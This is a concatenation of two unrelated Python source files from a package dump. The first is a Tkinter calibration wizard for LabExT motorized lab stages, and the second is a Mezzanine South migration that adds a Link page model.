"this is not intended. Do you want still to proceed?")
return True
def _get_safe_value(
self,
var: Type[DoubleVar],
to_type: type,
default=None):
"""
Returns the value of a tkinter entry and cast it to a specified type.
If casting or retrieving fails, it returns a default value.
"""
try:
return to_type(var.get())
except (ValueError, TypeError):
return default
class CalibrationWizard(Wizard):
"""
Wizard to calibrate stages.
"""
def __init__(
self,
master,
mover,
chip=None,
experiment_manager=None
) -> None:
"""
Constructor for new Mover Wizard.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
chip : Chip = None
Optional instance of the current chip.
Required for coordinate pairing step.
experiment_manager : ExperimentManager = None
Optional instance of the current experiment manager
"""
self.mover: Type[MoverNew] = mover
self.chip: Type[Chip] = chip
self.experiment_manager = experiment_manager
if len(self.mover.calibrations) == 0:
raise RuntimeError(
"Calibration not possible without connected stages.")
super().__init__(
master,
width=1100,
height=800,
on_finish=self.finish,
next_button_label="Next Step",
previous_button_label="Previous Step",
cancel_button_label="Cancel",
finish_button_label="Finish Setup",
)
self.title("Configure Mover")
self.calibrate_axes_step = AxesCalibrationStep(self, self.mover)
self.coordinate_pairing_step = CoordinatePairingStep(
self, self.mover, self.chip)
self.calibrate_axes_step.next_step = self.coordinate_pairing_step
self.coordinate_pairing_step.previous_step = self.calibrate_axes_step
self.current_step = self.calibrate_axes_step
def finish(self):
"""
Callback when user wants to finish the calibration.
"""
try:
self.mover.dump_calibrations()
except Exception as err:
messagebox.showerror(
"Error",
f"Could not store calibration settings to disk: {err}",
parent=self)
return False
return True
class StageDriverStep(Step):
"""
Wizard Step to load stage drivers.
"""
def __init__(self, wizard, mover) -> None:
"""
Constructor for new Wizard step for loading drivers.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
"""
super().__init__(
wizard,
self.build,
title="Driver Settings")
self.mover: Type[MoverNew] = mover
def build(self, frame: Type[CustomFrame]) -> None:
"""
Builds step to load stage drivers.
Parameters
----------
frame : CustomFrame
Instance of a customized Tkinter frame.
"""
frame.title = "Load Stage Drivers"
Label(
frame,
text="Below you can see all Stage classes available in LabExT.\nSo that all stages can be found correctly in the following step, make sure that the drivers for each class are loaded."
).pack(side=TOP, fill=X)
if not self.mover.stage_classes:
Label(
frame,
text="No stage classes found!",
foreground="#FF3333").pack(
side=TOP,
fill=X)
for stage_name, stage_cls in self.mover.stage_classes.items():
stage_driver_frame = Frame(frame)
stage_driver_frame.pack(side=TOP, fill=X, pady=2)
Label(
stage_driver_frame,
text=f"[{stage_cls.__name__}] {stage_cls.description}"
).pack(side=LEFT, fill=X)
stage_driver_load = Button(
stage_driver_frame,
text="Load Driver",
state=NORMAL if stage_cls.driver_specifiable else DISABLED,
command=partial(
stage_cls.load_driver,
parent=self.wizard))
stage_driver_load.pack(side=RIGHT)
stage_driver_status = Label(
stage_driver_frame,
text="Loaded" if stage_cls.driver_loaded else "Not Loaded",
foreground='#4BB543' if stage_cls.driver_loaded else "#FF3333",
)
stage_driver_status.pack(side=RIGHT, padx=10)
class StageAssignmentStep(Step):
"""
Wizard Step to assign and connect stages.
"""
POLYGON_OPTIONS = {
pg.__name__: pg for pg in StagePolygon.find_polygon_classes()}
ASSIGNMENT_MENU_PLACEHOLDER = "-- unused --"
DEFAULT_POLYGON = SingleModeFiber
DEFAULT_ASSIGNMENT = (
ASSIGNMENT_MENU_PLACEHOLDER,
DevicePort.INPUT)
def __init__(self, wizard, mover) -> None:
"""
Constructor for new Wizard step for assigning stages.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
"""
super().__init__(
wizard,
self.build,
on_reload=self.on_reload,
title="Stage Connection")
self.mover: Type[MoverNew] = mover
self.assignment = {
c.stage: (o, p)
for (o, p), c in self.mover.calibrations.items()}
self.polygon_cfg = {
c.stage: (c.stage_polygon.__class__, c.stage_polygon.parameters)
for c in self.mover.calibrations.values()}
self.orientation_vars, self.port_vars, self.polygon_vars = self._build_assignment_variables()
self._stage_polygon_parameter_tables = {}
def build(self, frame: Type[CustomFrame]) -> None:
"""
Builds step to assign stages.
Parameters
----------
frame : CustomFrame
Instance of a customized Tkinter frame.
"""
frame.title = "Manage Stage Connections"
Label(
frame,
text="Below you can see all the stages found by LabExT.\nIf stages are missing, go back one step and check if all drivers are loaded."
).pack(side=TOP, fill=X)
available_stages_frame = CustomFrame(frame)
available_stages_frame.title = "Available Stages"
available_stages_frame.pack(side=TOP, fill=X)
CustomTable(
parent=available_stages_frame,
selectmode='none',
columns=(
'ID', 'Description', 'Stage Class', 'Address', 'Connected'
),
rows=[
(idx,
s.__class__.description,
s.__class__.__name__,
s.address_string,
s.connected)
for idx, s in enumerate(self.mover.available_stages)])
stage_assignment_frame = CustomFrame(frame)
stage_assignment_frame.title = "Assign Stages"
stage_assignment_frame.pack(side=TOP, fill=X)
for avail_stage in self.mover.available_stages:
available_stage_frame = Frame(stage_assignment_frame)
available_stage_frame.pack(side=TOP, fill=X, pady=2)
Label(
available_stage_frame, text=str(avail_stage), anchor="w"
).pack(side=LEFT, fill=X, padx=(0, 10))
polygon_menu = OptionMenu(
available_stage_frame,
self.polygon_vars[avail_stage],
*(list(self.POLYGON_OPTIONS.keys()))
)
polygon_menu.pack(side=RIGHT, padx=5)
polygon_menu.config(state=DISABLED if self.orientation_vars[avail_stage].get(
) == self.ASSIGNMENT_MENU_PLACEHOLDER else NORMAL)
Label(
available_stage_frame, text="Stage type:"
).pack(side=RIGHT, fill=X, padx=5)
port_menu = OptionMenu(
available_stage_frame,
self.port_vars[avail_stage],
*(list(DevicePort))
)
port_menu.pack(side=RIGHT, padx=5)
port_menu.config(state=DISABLED if self.orientation_vars[avail_stage].get(
) == self.ASSIGNMENT_MENU_PLACEHOLDER else NORMAL)
Label(
available_stage_frame, text="Device Port:"
).pack(side=RIGHT, fill=X, padx=5)
OptionMenu(
available_stage_frame,
self.orientation_vars[avail_stage],
*([self.ASSIGNMENT_MENU_PLACEHOLDER] + list(Orientation))
).pack(side=RIGHT, padx=5)
Label(
available_stage_frame, text="Stage Orientation:"
).pack(side=RIGHT, fill=X, padx=5)
# Enable configuration if orientation is selected
if self.orientation_vars[avail_stage].get(
) != self.ASSIGNMENT_MENU_PLACEHOLDER:
polygon_cfg_frame = Frame(stage_assignment_frame)
polygon_cfg_frame.pack(side=TOP, fill=X)
polygon_cls, polygon_cls_cfg = self.polygon_cfg.get(
avail_stage, (self.DEFAULT_POLYGON, self.DEFAULT_POLYGON.get_default_parameters()))
polygon_params = {
l: MeasParamAuto(
value=v) for l,
v in polygon_cls_cfg.items()}
polygon_cfg_table = ParameterTable(polygon_cfg_frame)
polygon_cfg_table.title = f"Configure Polygon: {polygon_cls.__name__}"
polygon_cfg_table.parameter_source = polygon_params
polygon_cfg_table.pack(
side=TOP, fill=X, expand=0, padx=2, pady=2)
self._stage_polygon_parameter_tables[avail_stage] = polygon_cfg_table
def on_reload(self) -> None:
"""
Callback, when wizard step gets reloaded.
Checks if there is an assignment and if no stage, orientation or port was used twice.
"""
if not self.assignment:
self.finish_step_enabled = False
self.wizard.set_error("Please assign at least one to proceed.")
return
orientations, ports = zip(*self.assignment.values())
double_orientations = len(orientations) != len(set(orientations))
ports_orientations = len(ports) != len(set(ports))
if double_orientations or ports_orientations:
self.finish_step_enabled = False
self.wizard.set_error(
"Please do not assign a orientation or device port twice.")
return
self.finish_step_enabled = True
self.wizard.set_error("")
def change_assignment(self, stage: Stage) -> None:
"""
Callback, when user changes a stage assignment.
Updates internal wizard state and reloads contents.
"""
port = self.port_vars[stage].get()
orientation = self.orientation_vars[stage].get()
polygon_cls_name = self.polygon_vars[stage].get()
polygon_cls = self.POLYGON_OPTIONS[polygon_cls_name]
if orientation == self.ASSIGNMENT_MENU_PLACEHOLDER:
self.assignment.pop(stage, None)
self.wizard.__reload__()
return
if stage in self._stage_polygon_parameter_tables:
polygon_cls_cfg = self._stage_polygon_parameter_tables[stage].make_json_able(
)
else:
polygon_cls_cfg = polygon_cls.get_default_parameters()
self.polygon_cfg[stage] = (polygon_cls, polygon_cls_cfg)
self.assignment[stage] = (
Orientation[orientation.upper()],
DevicePort[port.upper()])
self.wizard.__reload__()
def update_polygon_cfg(self) -> None:
"""
Updates polygon configuration by reading values from table.
"""
for stage, polygon_cfg_table in self._stage_polygon_parameter_tables.items():
polygon_cls_name = self.polygon_vars[stage].get()
polygon_cls = self.POLYGON_OPTIONS[polygon_cls_name]
self.polygon_cfg[stage] = (
polygon_cls, polygon_cfg_table.make_json_able())
def _build_assignment_variables(self) -> tuple:
"""
Builds and returns Tkinter variables for orrientation and port selection.
"""
orientation_vars = {}
port_vars = {}
polygon_vars = {}
for stage in self.mover.available_stages:
orientation, port = self.assignment.get(
stage, self.DEFAULT_ASSIGNMENT)
polygon_cls, _ = self.polygon_cfg.get(
stage, (self.DEFAULT_POLYGON, {}))
port_var = StringVar(self.wizard, port)
port_var.trace(
W, lambda *_, stage=stage: self.change_assignment(stage))
orientation_var = StringVar(self.wizard, orientation)
orientation_var.trace(
W, lambda *_, stage=stage: self.change_assignment(stage))
polygon_var = StringVar(self.wizard, polygon_cls.__name__)
polygon_var.trace(
W, lambda *_, stage=stage: self.change_assignment(stage))
orientation_vars[stage] = orientation_var
port_vars[stage] = port_var
polygon_vars[stage] = polygon_var
return orientation_vars, port_vars, polygon_vars
class ConfigureMoverStep(Step):
def __init__(self, wizard, mover) -> None:
super().__init__(
wizard,
self.build,
finish_step_enabled=True,
title="Stage Configuration")
self.mover: Type[MoverNew] = mover
self.xy_speed_var = DoubleVar(
self.wizard,
self.mover.speed_xy if self.mover._speed_xy else self.mover.DEFAULT_SPEED_XY)
self.z_speed_var = DoubleVar(
self.wizard,
self.mover.speed_z if self.mover._speed_z else self.mover.DEFAULT_SPEED_Z)
self.xy_acceleration_var = DoubleVar(
self.wizard,
self.mover.acceleration_xy if self.mover._acceleration_xy else self.mover.DEFAULT_ACCELERATION_XY)
self.z_lift_var = DoubleVar(
self.wizard,
self.mover.z_lift if self.mover._z_lift else self.mover.DEFAULT_Z_LIFT)
def build(self, frame: Type[CustomFrame]):
"""
Builds step to configure stages.
"""
frame.title = "Configure Assigned Stages"
Label(
frame,
text="Configure the selected stages.\nThese settings are applied globally to all selected stages."
).pack(side=TOP, fill=X)
stage_properties_frame = CustomFrame(frame)
stage_properties_frame.title = "Speed and Acceleration Settings"
stage_properties_frame.pack(side=TOP, fill=X)
Label(
stage_properties_frame,
anchor="w",
text="Speed Hint: A value of 0 (default) deactivates the speed control feature. The stage will move as fast as possible!"
).pack(side=TOP, fill=X)
Label(
stage_properties_frame,
anchor="w",
text="Acceleration Hint: A value of 0 (default) deactivates the acceleration control feature."
).pack(side=TOP, fill=X)
self._build_entry_with_label(
stage_properties_frame,
self.xy_speed_var,
label="Movement speed xy direction (valid range: {}...{:.0e}um/s):".format(
self.mover.SPEED_LOWER_BOUND,
self.mover.SPEED_UPPER_BOUND),
unit="[um/s]")
self._build_entry_with_label(
stage_properties_frame,
self.z_speed_var,
label="Movement speed z direction (valid range: {}...{:.0e}um/s):".format(
self.mover.SPEED_LOWER_BOUND,
self.mover.SPEED_UPPER_BOUND),
unit="[um/s]")
self._build_entry_with_label(
stage_properties_frame,
self.xy_acceleration_var,
label="Movement acceleration xy direction (valid range: {}...{:.0e}um/s^2):".format(
self.mover.ACCELERATION_LOWER_BOUND,
self.mover.ACCELERATION_UPPER_BOUND),
unit="[um/s^2]")
self._build_entry_with_label(
stage_properties_frame,
self.z_lift_var,
label="Z channel up-movement during xy movement:",
unit="[um]")
def _build_entry_with_label(
self,
parent,
var: Type[DoubleVar],
label: str = None,
unit: str = None) -> None:
"""
Builds an tkinter entry with label and unit.
"""
entry_frame = Frame(parent)
entry_frame.pack(side=TOP, fill=X, pady=2)
Label(entry_frame, text=label).pack(side=LEFT)
Label(entry_frame, text=unit).pack(side=RIGHT)
entry = Entry(entry_frame, textvariable=var)
entry.pack(side=RIGHT, padx=10)
class AxesCalibrationStep(Step):
"""
Wizard Step to calibrate stage axes.
"""
STAGE_AXIS_OPTIONS = bidict({o: " ".join(map(str, o))
for o in product(Direction, Axis)})
def __init__(self, wizard, mover) -> None:
"""
Constructor for new Wizard step for calibrating stage axes.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
"""
super().__init__(
wizard,
self.build,
on_reload=self.on_reload,
on_next=self.on_next,
title="Stage Axes Calibration")
self.mover: Type[MoverNew] = mover
self.logger = getLogger()
self.axes_mapping_vars = self._build_axes_mapping_vars()
def _build_axes_mapping_vars(self):
"""
Builds and returns Tkinter variables for axes calibration.
"""
vars = {}
for calibration in self.mover.calibrations.values():
# Get current mapping
_current_mapping = {}
if calibration._axes_rotation and calibration._axes_rotation.is_valid:
_current_mapping = calibration._axes_rotation.mapping
for chip_axis in Axis:
_current_value = _current_mapping.get(
chip_axis, (Direction.POSITIVE, chip_axis))
str_var = StringVar(self.wizard, _current_value)
str_var.trace(
W,
lambda *_,
calibration=calibration,
chip_axis=chip_axis: self.calibrate_axis(
calibration,
chip_axis))
vars.setdefault(calibration, {})[chip_axis] = str_var
return vars
def build(self, frame: Type[CustomFrame]):
"""
Builds step to calibrate axes.
Parameters
----------
frame : CustomFrame
Instance of a customized Tkinter frame.
"""
frame.title = "Fix Coordinate System"
Label(
frame,
text="In order for each stage to move relative to the chip coordinates, the direction of each axis of each stage must be defined. \n Postive Y-Axis: North of chip, Positive X-Axis: East of chip, Positive Z-Axis: Lift stage"
).pack(side=TOP, fill=X)
for calibration in self.mover.calibrations.values():
stage_calibration_frame = CustomFrame(frame)
stage_calibration_frame.title = str(calibration)
stage_calibration_frame.pack(side=TOP, fill=X, pady=2)
for chip_axis in Axis:
chip_axis_frame = Frame(stage_calibration_frame)
chip_axis_frame.pack(side=TOP, fill=X)
Label(
chip_axis_frame,
text="Positive {}-Chip-axis points to ".format(chip_axis.name)
).pack(side=LEFT)
OptionMenu(
chip_axis_frame,
self.axes_mapping_vars[calibration][chip_axis],
*self.STAGE_AXIS_OPTIONS.values(),
).pack(side=LEFT)
Label(chip_axis_frame, text="of Stage").pack(side=LEFT)
wiggle_button = Button(
chip_axis_frame,
text="Wiggle {}-Axis".format(
chip_axis.name),
command=lambda axis=chip_axis,
calibration=calibration: self.wiggle_axis(
calibration,
axis),
state=NORMAL if calibration._axes_rotation.is_valid else DISABLED)
wiggle_button.pack(side=RIGHT)
def on_reload(self) -> None:
"""
Callback, when coordinate system fixation step gets reloaded.
Checks, if the current assignment is valid.
"""
if all(c._axes_rotation.is_valid for c in self.mover.calibrations.values()):
self.next_step_enabled = True
self.wizard.set_error("")
else:
self.next_step_enabled = False
self.wizard.set_error("Please do not assign a stage axis twice.")
def on_next(self) -> bool:
"""
Callback, when user finishes axes calibration.
Stores rotation to file.
"""
try:
self.mover.dump_axes_rotations()
except Exception as err:
messagebox.showerror(
"Error",
f"Failed to store axes rotation to file: {err}",
parent=self.wizard)
return False
return True
def calibrate_axis(self, calibration: Type[Calibration], chip_axis: Axis):
"""
Callback, when user wants to change the axis rotation of a calibration.
"""
axis_var = self.axes_mapping_vars[calibration][chip_axis]
direction, stage_axis = self.STAGE_AXIS_OPTIONS.inverse[axis_var.get()]
calibration.update_axes_rotation(chip_axis, direction, stage_axis)
self.wizard.__reload__()
def wiggle_axis(self, calibration: Type[Calibration], chip_axis: Axis):
"""
Callback, when user wants to wiggle an axis.
Parameters
----------
calibration: Calibration
Instance of a calibration
chip_axis: Axis
Requested chip axis to wiggle
"""
if not self._confirm_wiggle(chip_axis):
return
try:
run_with_wait_window(
self.wizard,
f"Wiggle {chip_axis} of {calibration}",
lambda: calibration.wiggle_axis(chip_axis))
except RuntimeError as e:
self.logger.log(f"Wiggling {chip_axis} failed: {e}")
messagebox.showerror(
"Error"
f"Wiggling {chip_axis} failed: {e}",
parent=self.wizard)
def _confirm_wiggle(self, axis) -> bool:
"""
Confirms with user if wiggeling is allowed.
"""
message = 'By proceeding this button will move the stage along the {} direction. \n\n'.format(axis) \
+ 'Please make sure it has enough travel range(+-5mm) to avoid collision. \n\n' \
+ 'For correct operation the stage should: \n' \
+ 'First: Move in positive {}-Chip-Axis direction \n'.format(axis) \
+ 'Second: Move in negative {}-Chip-Axis direction \n\n'.format(axis) \
+ 'If not, please check your assignments.\n Do you want to proceed with wiggling?'
return messagebox.askokcancel("Warning", message, parent=self.wizard)
class CoordinatePairingStep(Step):
"""
Wizard Step to fully calibrate stages.
"""
def __init__(self, wizard, mover, chip) -> None:
"""
Constructor for new Wizard step for fully calibrate stages.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
chip : Chip
Instance of the current chip.
"""
super().__init__(
wizard,
self.build,
finish_step_enabled=True,
on_reload=self.on_reload,
title="Stage Configuration")
self.mover: Type[MoverNew] = mover
self.chip: Type[Chip] = chip
self._use_input_stage_var = BooleanVar(
self.wizard, self.mover.has_input_calibration)
self._use_output_stage_var = BooleanVar(
self.wizard, self.mover.has_output_calibration)
self._full_calibration_new_pairing_button = None
self._coordinate_pairing_table = None
self._coordinate_pairing_window = None
self.pairings = self._build_pairings()
def _build_pairings(self) -> list:
"""
Returns a list of current pairings.
"""
pairings = []
for calibration in self.mover.calibrations.values():
_kabsch_rotation = calibration._kabsch_rotation
if _kabsch_rotation and _kabsch_rotation.is_valid:
pairings += _kabsch_rotation.pairings
_single_point_offset = calibration._single_point_offset
if _single_point_offset and _single_point_offset.is_valid:
if _single_point_offset.pairing not in pairings:
pairings.append(_single_point_offset.pairing)
return pairings
def build(self, frame: Type[CustomFrame]):
"""
Builds step to fully calibrate axes.
Parameters
----------
frame : CustomFrame
Instance of a customized Tkinter frame.
"""
frame.title = "Calibrate Stage to enable absolute movement"
Label(
frame,
text="To move the stages absolutely in chip coordinates, define at least 3 stage-chip-coordinate pairings to calculate the rotation. \n" +
"Note: After the first coordinate pairing, the stages can be moved approximatively absolute in chip coordinates.").pack(
side=TOP,
fill=X)
# Render frame to for current chip
chip_frame = CustomFrame(frame)
chip_frame.title = "Imported Chip"
chip_frame.pack(side=TOP, fill=X, pady=5)
Label(
chip_frame,
text="The calibration is calculated using several coordinate pairs consisting of chip and stage coordinates. \n"
"The following chip is used for calibration:").pack(
side=TOP,
fill=X)
if self.chip:
Label(
chip_frame,
text=f"{self.chip.name} (imported from {self.chip.path})",
foreground='#4BB543'
).pack(side=LEFT, fill=X)
else:
Label(
chip_frame,
text="No Chip imported!",
foreground='#FF3333'
).pack(side=LEFT, fill=X)
Button(
chip_frame,
text="Import Chip",
command=self._on_chip_import
).pack(side=RIGHT)
# Render table with all defined pairings
pairings_frame = CustomFrame(frame)
pairings_frame.title = "Defined Pairings"
pairings_frame.pack(side=TOP, fill=X, pady=5)
pairings_table_frame = Frame(pairings_frame)
pairings_table_frame.pack(side=TOP, fill=X, expand=False)
self._coordinate_pairing_table = CustomTable(
parent=pairings_table_frame,
selectmode='extended',
columns=(
'ID',
'Stage',
'Stage Cooridnate',
'Device',
'Chip Coordinate'),
rows=[(
str(idx),
str(p.calibration),
str(p.stage_coordinate),
str(p.device.short_str),
str(p.chip_coordinate)
) for idx, p in enumerate(self.pairings)])
Button(
pairings_frame,
text="Remove selected pairings",
state=DISABLED if len(self.pairings) == 0 else NORMAL,
command=self._remove_pairings
).pack(side=LEFT)
Button(
pairings_frame,
text="Reset all pairings",
state=DISABLED if len(self.pairings) == 0 else NORMAL,
command=self._reset_all_pairings
).pack(side=RIGHT)
# Render frame to show current calibration state
calibration_summary_frame = CustomFrame(frame)
calibration_summary_frame.pack(side=TOP, fill=X, pady=5)
for calibration in self.mover.calibrations.values():
stage_calibration_frame = CustomFrame(calibration_summary_frame)
stage_calibration_frame.title = str(calibration)
stage_calibration_frame.pack(side=TOP, fill=X, pady=2)
# SINGLE POINT STATE
Label(
stage_calibration_frame,
text="Single Point Fixation:"
).grid(row=0, column=0, padx=2, pady=2, sticky=W)
Label(
stage_calibration_frame,
text=calibration._single_point_offset,
foreground='#4BB543' if calibration._single_point_offset.is_valid else "#FF3333",
).grid(
row=0,
column=1,
padx=2,
pady=2,
sticky=W)
# GLOBAL STATE
Label(
stage_calibration_frame,
text="Global Transformation:"
).grid(row=1, column=0, padx=2, pady=2, sticky=W)
Label(
stage_calibration_frame,
text=calibration._kabsch_rotation,
foreground='#4BB543' if calibration._kabsch_rotation.is_valid else "#FF3333",
).grid(
row=1,
column=1,
padx=2,
pady=2,
sticky=W)
if calibration._kabsch_rotation.is_valid:
rad, deg, per = calibration._kabsch_rotation.get_z_plane_angles()
Label(
stage_calibration_frame,
text="Angle between XY Plane: "
"{:.2f} rad - {:.2f}° - {:.2f}%".format(rad, deg, per)
).grid(row=2, column=1, padx=2, pady=2, sticky=W)
# FRAME FOR NEW PAIRING
new_pairing_frame = CustomFrame(frame)
new_pairing_frame.title = "Create New Pairing"
new_pairing_frame.pack(side=TOP, fill=X, pady=5)
if self.mover.has_input_calibration:
Checkbutton(
new_pairing_frame,
text="Use Input-Stage for Pairing",
state=NORMAL if self.chip else DISABLED,
variable=self._use_input_stage_var
).pack(side=LEFT)
if self.mover.has_output_calibration:
Checkbutton(
new_pairing_frame,
text="Use Output-Stage for Pairing",
state=NORMAL if self.chip else DISABLED,
variable=self._use_output_stage_var
).pack(side=LEFT)
self._full_calibration_new_pairing_button = Button(
new_pairing_frame,
text="New Pairing...",
state=NORMAL if self.chip else DISABLED,
command=self._new_coordinate_pairing)
self._full_calibration_new_pairing_button.pack(side=RIGHT)
def on_reload(self):
"""
Callback, when wizard step gets reloaded.
Checks, if the all transformations are vald.
"""
if not self.chip:
self.next_step_enabled = False
self.finish_step_enabled = False
self.wizard.set_error("Please import a chip to calibrate stages.")
return
if not all(
c._single_point_offset.is_valid for c in self.mover.calibrations.values()):
self.next_step_enabled = False
self.finish_step_enabled = False
self.wizard.set_error("Please fix for each stage a single point.")
return
if not all(
c._kabsch_rotation.is_valid for c in self.mover.calibrations.values()):
self.next_step_enabled = False
self.finish_step_enabled = True
self.wizard.set_error(
"Please define for each stage at least three points to calibrate the stages globally.")
return
self.finish_step_enabled = True
self.next_step_enabled = True
self.wizard.set_error("")
def _reset_all_pairings(self):
"""
Resets all pairings if the user confirms before.
"""
if len(self.pairings) == 0:
return
if not messagebox.askokcancel(
"Reset all pairings",
f"Are you sure to delete all {len(self.pairings)} coordinate pairs? "
"This step cannot be undone.",
parent=self.wizard):
return
for calibration in self.mover.calibrations.values():
calibration.reset_single_point_offset()
calibration.reset_kabsch_rotation()
self.pairings = []
self.wizard.__reload__()
def _remove_pairings(self):
"""
Removes all selected pairings.
"""
if len(self.pairings) == 0:
return
blacklisted_pairings = self._get_selected_pairings()
if len(blacklisted_pairings) == 0:
messagebox.showerror(
"No pairings selected",
"No pairings were selected for deletion.",
parent=self.wizard)
return
whitelisted_pairings = [
p for p in self.pairings if p not in blacklisted_pairings]
# Reset all
for calibration in self.mover.calibrations.values():
calibration.reset_single_point_offset()
calibration.reset_kabsch_rotation()
self.pairings = []
# Calc new transformations
self._save_coordinate_pairing(whitelisted_pairings)
self.wizard.__reload__()
def _get_selected_pairings(self) -> List[CoordinatePairing]:
"""
Returns a list of selected pairings in table.
"""
if not self._coordinate_pairing_table:
return []
selected_pairings = []
checked_iids = self._coordinate_pairing_table._tree.selection()
for iid in checked_iids:
pairing_idx = self._coordinate_pairing_table._tree.set(iid, 0)
try:
selected_pairings.append(
self.pairings[int(pairing_idx)])
except (IndexError, ValueError):
continue
return selected_pairings
def _new_coordinate_pairing(self):
"""
Creates a window to create a coordinate pairing.
"""
if self._check_for_exisiting_coordinate_window():
return
with_input_stage = self._use_input_stage_var.get()
with_output_stage = self._use_output_stage_var.get()
if not with_input_stage and not with_output_stage:
messagebox.showwarning(
"No Stages selected",
"No stages have been selected with which to create a coordinate pairing. "
"At least one stage must be selected.",
parent=self.wizard)
return
try:
self._coordinate_pairing_window = CoordinatePairingsWindow(
self.wizard,
self.mover,
self.chip,
experiment_manager=self.wizard.experiment_manager,
on_finish=self._save_coordinate_pairing,
with_input_stage=with_input_stage,
with_output_stage=with_output_stage)
except Exception as e:
messagebox.showerror(
"Error",
"Could not initiate a new coordinate pairing: {}".format(e),
parent=self.wizard)
def _save_coordinate_pairing(self, pairings: List[CoordinatePairing]):
"""
Delegates the list of pairings to the responsible calibrations.
"""
for p in pairings:
if not p.calibration._single_point_offset.is_valid:
p.calibration.update_single_point_offset(p)
p.calibration.update_kabsch_rotation(p)
self.pairings.append(p)
self.wizard.__reload__()
def _check_for_exisiting_coordinate_window(self) -> bool:
"""
Ensures that only one window exists to create a new coordinate pair.
Returns True if there is a exsiting window.
"""
if self._coordinate_pairing_window is None or not try_to_lift_window(
self._coordinate_pairing_window):
return False
if not messagebox.askyesno(
"New Coordinate-Pairing",
"You have an incomplete creation of a coordinate pair. Click Yes if you want to continue it or No if you want to create the new one.",
parent=self._coordinate_pairing_window):
self._coordinate_pairing_window.cancel()
self._coordinate_pairing_window = None
return False
return True
def _on_chip_import(self) -> None:
"""
Callback, when user wants to import a chip
"""
if not self.wizard.experiment_manager:
return
self.wizard.experiment_manager.main_window.open_import_chip()
self.chip = self.wizard.experiment_manager.chip
self.wizard.__reload__() | PypiClean |
/MezzanineFor1.7-3.1.10.tar.gz/MezzanineFor1.7-3.1.10/mezzanine/pages/migrations/south/0008_auto__add_link.py | import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Link'
db.create_table('pages_link', (
('page_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['pages.Page'], unique=True, primary_key=True)),
))
db.send_create_signal('pages', ['Link'])
def backwards(self, orm):
# Deleting model 'Link'
db.delete_table('pages_link')
models = {
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'generic.assignedkeyword': {
'Meta': {'ordering': "('_order',)", 'object_name': 'AssignedKeyword'},
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'assignments'", 'to': "orm['generic.Keyword']"}),
'object_pk': ('django.db.models.fields.IntegerField', [], {})
},
'generic.keyword': {
'Meta': {'object_name': 'Keyword'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'pages.link': {
'Meta': {'ordering': "('_order',)", 'object_name': 'Link', '_ormbases': ['pages.Page']},
'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'})
},
'pages.page': {
'Meta': {'ordering': "('titles',)", 'object_name': 'Page'},
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_footer': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
#'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': "orm['generic.AssignedKeyword']"}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['pages.Page']"}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'})
},
'pages.richtextpage': {
'Meta': {'ordering': "('_order',)", 'object_name': 'RichTextPage', '_ormbases': ['pages.Page']},
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
